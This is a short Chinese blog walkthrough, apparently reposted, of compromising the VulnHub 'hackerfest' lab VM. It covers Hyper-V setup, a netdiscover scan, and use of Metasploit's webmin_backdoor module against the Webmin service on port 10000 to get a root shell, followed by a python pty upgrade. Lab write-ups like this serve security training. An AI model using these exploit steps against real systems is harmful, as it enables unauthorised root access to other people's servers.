vulnhub之hackerfest的实践

admin 2020年8月2日16:38:49评论444 views字数 642阅读2分8秒阅读模式

本周实践的是vulnhub的hackerfest镜像,下载地址,https://download.vulnhub.com/hackerfest/HF2019-Linux.zip,

下载到的压缩包解开后发现磁盘文件是vhdx,明显是个hyper-v的磁盘文件,

先尝试了转成vmdk,但是系统起不来,没办法,只能装个hyper-v了,

再用这个vhdx磁盘文件创建虚机,启动没问题,

vulnhub之hackerfest的实践

接下来的活儿就跟以往实践的流程一致了,

首先进行地址扫描,

sudo netdiscover -r 192.168.137.0/24,这里知道192.168.137.196就是靶机地址,

vulnhub之hackerfest的实践

然后进行端口扫描,最重要的就是10000端口,且开了ssl的webmin,

vulnhub之hackerfest的实践

上metasploit,并且搜跟webmin有关的漏洞利用,webmin_backdoor这个就挺好,

vulnhub之hackerfest的实践

use exploit/linux/http/webmin_backdoor
set RHOSTS 192.168.137.196
set LHOST 192.168.137.83
set SSL true


vulnhub之hackerfest的实践

执行漏洞利用,获取到shell,id一眼,竟然直接就是root,都省的再提权了,也可以python -c 'import pty;pty.spawn("/bin/bash")'一下,转成交互式shell,干啥就都方便了,

vulnhub之hackerfest的实践

这个实践过程很简单,只是前期搭环境费了点儿劲,尝试vhdx转vmdk,以及安装hyper-v,并用vhdx起虚机,都需要有一些实践经验,才能快速搞定靶机环境。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年8月2日16:38:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之hackerfest的实践http://cn-sec.com/archives/79470.html

发表评论

匿名网友 填写信息